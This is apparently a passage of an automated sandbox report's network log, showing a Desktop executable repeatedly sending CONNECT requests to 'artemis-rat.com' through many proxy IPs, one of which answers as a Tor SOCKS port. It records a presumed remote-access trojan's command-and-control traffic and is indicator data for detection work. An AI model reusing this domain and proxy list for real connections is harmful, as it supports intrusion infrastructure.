                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:03.904939890 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2089192.168.2.554510184.170.249.6541453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.424830914 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2090192.168.2.554388148.72.206.84347613876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.440530062 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.592406988 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.702194929 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:00.702574015 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2091192.168.2.555136142.54.229.24941453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.733339071 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2092192.168.2.55548144.190.9.65481003876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.820817947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2093192.168.2.554376196.0.113.10568613876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.824078083 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.014228106 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:55.014431000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:01.014513969 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2094192.168.2.55547164.227.108.25319083876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.826883078 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2095192.168.2.55516965.169.38.73265923876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.843770027 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2096192.168.2.554360106.105.218.244803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.870424032 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.905112028 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.998819113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:01.092752934 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2097192.168.2.552491104.248.151.220636483876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.870474100 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.905092001 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.998819113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:01.092752934 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2098192.168.2.554356123.241.210.123803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.906979084 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.092408895 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:55.202094078 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:01.202137947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2099192.168.2.55548360.188.102.225180803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.915877104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2100192.168.2.552622132.148.128.88266063876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.068006992 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.217588902 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2101192.168.2.55452491.241.217.5890903876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.077931881 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2102192.168.2.554535199.229.254.12941453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.077934027 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2103192.168.2.55459451.15.139.15163793876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.091886997 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.092709064 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:53.605850935 CET536INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please confi


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2104192.168.2.55457582.223.121.72271373876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.626099110 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:53.701931000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:56.702076912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:02.701881886 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2105192.168.2.555487185.101.16.52803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.626393080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2106192.168.2.554631190.104.20.8280803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.626585007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2107192.168.2.55548845.11.95.16552193876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.629548073 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2108192.168.2.55475272.167.221.145420433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.788564920 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2109192.168.2.554710162.240.239.103427713876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.794888973 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:53.905008078 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2110192.168.2.552527128.199.165.63490933876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.804311991 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2111192.168.2.554768175.213.76.24803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.807193995 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
